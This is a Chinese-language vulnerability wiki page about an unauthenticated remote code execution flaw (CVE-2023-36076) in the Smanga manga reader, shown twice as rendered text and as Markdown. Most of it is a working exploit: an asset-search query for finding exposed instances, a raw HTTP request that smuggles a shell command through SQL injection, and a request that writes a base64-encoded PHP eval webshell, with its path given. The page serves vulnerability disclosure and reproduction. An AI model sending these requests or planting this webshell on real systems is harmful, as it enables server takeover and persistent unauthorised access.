fofamini-wiki

登录白背景

源码

Smanga未授权远程代码执行漏洞(CVE-2023-36076)

一、漏洞简介

Smanga无需配置，docker直装的漫画流媒体阅读工具。以emby plex为灵感，为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞，攻击者可在目标主机执行任意命令，获取服务器权限。

二、影响版本

Smanga

三、资产测绘

hunterweb.title=="smanga"
特征

四、漏洞复现

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

获取命令执行结果

GET /php/manga/1.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

写入webshell

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

webshell地址

/php/manga/1.php

原文: https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33

# Smanga未授权远程代码执行漏洞(CVE-2023-36076)

# 一、漏洞简介
Smanga无需配置，docker直装的漫画流媒体阅读工具。以emby plex为灵感，为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞，攻击者可在目标主机执行任意命令，获取服务器权限。

# 二、影响版本

- Smanga

# 三、资产测绘

- hunter`web.title=="smanga"`
- 特征

![image.png](./img/6zH2rDbEXutDEKrx/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-986145.png)

# 四、漏洞复现
```java
POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```
![image.png](./img/6zH2rDbEXutDEKrx/1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59-255410.png)
获取命令执行结果
```java
GET /php/manga/1.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```
![image.png](./img/6zH2rDbEXutDEKrx/1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce-763786.png)
写入webshell
```java
POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```
webshell地址
```java
/php/manga/1.php
```
![image.png](./img/6zH2rDbEXutDEKrx/1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77-102471.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33>